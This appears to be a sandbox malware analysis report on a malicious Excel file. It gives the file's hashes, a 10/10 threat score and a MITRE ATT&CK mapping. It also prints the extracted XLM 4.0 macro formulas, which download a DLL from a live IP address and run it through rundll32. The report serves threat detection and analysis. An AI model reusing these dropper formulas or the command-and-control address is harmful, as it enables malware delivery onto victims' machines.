Overview

overview

10

Static

static

10

021412d6c7...18.xls

windows7-x64

10

021412d6c7...18.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118

  • Size

    101KB

  • Sample

    240427-bmrwjagg5z

  • MD5

    021412d6c7f5d8357ca18623ab41d2c4

  • SHA1

    59807e7fa0de3d3d39db6c154ee3a94c63ffea5f

  • SHA256

    e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421

  • SHA512

    84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398

  • SSDEEP

    3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://209.141.54.161/crypt.dll

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://209.141.54.161/crypt.dll","C:\rncwner\CkkYKlI\UiQhTXx.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkkYKlI\UiQhTXx.dll DllRegisterServer",0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://209.141.54.161/crypt.dll

Targets

    • Target

      021412d6c7f5d8357ca18623ab41d2c4_JaffaCakes118

    • Size

      101KB

    • MD5

      021412d6c7f5d8357ca18623ab41d2c4

    • SHA1

      59807e7fa0de3d3d39db6c154ee3a94c63ffea5f

    • SHA256

      e1fbc397fd27ff212644a632aef8a3ca1debbd7c0327b461fa9e964351a7f421

    • SHA512

      84515748131e55e8bb8442d5fa728f2db3961ac0d8eb23055dbe8ea5b94f56a23ac35a34dd939e134c39161d356956d4d883e0bc6aa9741693f868604db38398

    • SSDEEP

      3072:JQxEtjPOtioVjDGUU1qfDlaGGx+cL2QnABtQ/XsfEABhnz2JNpfPNGN71:6xEtjPOtioVjDGUU1qfDlavx+W2QnAmI

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks